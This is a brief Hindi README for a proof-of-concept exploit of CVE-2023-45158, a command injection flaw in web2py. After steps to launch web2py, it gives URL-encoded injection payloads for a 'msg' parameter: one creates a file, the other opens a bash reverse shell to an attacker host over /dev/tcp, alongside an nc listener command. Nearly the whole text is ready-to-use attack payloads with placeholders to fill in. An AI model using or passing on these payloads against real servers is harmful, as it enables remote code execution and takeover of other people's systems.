
CVE-2023-45158 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो web2py में एक कमांड इंजेक्शन भेद्यता है। क्राफ्टेड HTTP अनुरोधों के माध्यम से रिमोट कोड निष्पादन प्रदर्शित करता है, जिसमें फ़ाइल निर्माण और रिवर्स शेल पेलोड शामिल हैं।
cd web2py
python3 web2py.py
http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27 का उपयोग करके इंजेक्ट करें। <IP-ADDRESS> और <YOUR-COMMAND> को अपने मानों से बदलें।http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27
हमलावर की मशीन पर, nc -l 127.0.0.1 8080 चलाएँ
URL पर जाएँ http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27। <ATTACKER-IP> को बदलें।